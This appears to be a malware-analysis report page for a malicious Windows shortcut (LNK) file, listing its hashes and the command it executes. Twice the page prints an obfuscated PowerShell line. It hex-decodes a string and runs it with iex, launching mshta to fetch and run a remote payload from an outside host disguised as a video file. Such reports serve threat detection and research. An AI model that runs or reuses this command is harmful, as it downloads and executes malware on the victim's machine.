Malicious
d427de5b2969cfbdf7389ab269b8c6ef
LNK File | MD5: d427de5b2969cfbdf7389ab269b8c6ef | Size: 3.06 KB | application/x-ms-shortcut
LNK File
MD5: d427de5b2969cfbdf7389ab269b8c6ef
Size: 3.06 KB
application/x-ms-shortcut
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | d427de5b2969cfbdf7389ab269b8c6ef
|
| Sha1 | 8cfaa97167941fd0454626c8f37c9b967bd06448
|
| Sha256 | de159f05285cc600035d92f7da1a7441a092d169df5fbe1cbeada8d2118c3fdb
|
| Sha384 | 1da3ee0e1880d1ad7dabebb6142e0b574fbcd13a8df7214bdf21db31f350379b31eb2179cf496d44a6098f130ece8145
|
| Sha512 | ab5ff3579e624355717939c9035edc78c23576d338ecd6ccc988bf7e3e659f8a712b2f110dbc99d7b600499630dff8a1ccf0e42636ccf24e1efc6b6165a09395
|
| SSDeep | 24:8Ayw/BHYVKVWf+/CWkAZK3YbyZNgER0HrhlczAedd79dsrabxJlpl9l:8y5a3AZKIUqHrhqUedJ9AadrL9
|
| TLSH | 4551CF3D5AE61329E2B6DB7298BA6212F837BD42F9308E4D10CE43481723615B4D5F2F
|
File Structure
d427de5b2969cfbdf7389ab269b8c6ef
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe [Text.Encoding]::UTF8.GetString((('26284765742d48656c7020693f78292e4e616d6520272628676920433a5c572a735c532a325c6d73682a65292068747470733a2f2f7570646174652d686f73742d6f6e652e746f702f4972657566684766332f706179312e6d703427' -split '(..)'|?{$_})|%{[Convert]::ToByte($_,16)}))|iex |
d427de5b2969cfbdf7389ab269b8c6ef (3.06 KB)
File Structure
d427de5b2969cfbdf7389ab269b8c6ef
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe [Text.Encoding]::UTF8.GetString((('26284765742d48656c7020693f78292e4e616d6520272628676920433a5c572a735c532a325c6d73682a65292068747470733a2f2f7570646174652d686f73742d6f6e652e746f702f4972657566684766332f706179312e6d703427' -split '(..)'|?{$_})|%{[Convert]::ToByte($_,16)}))|iex Malicious |
d427de5b2969cfbdf7389ab269b8c6ef |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.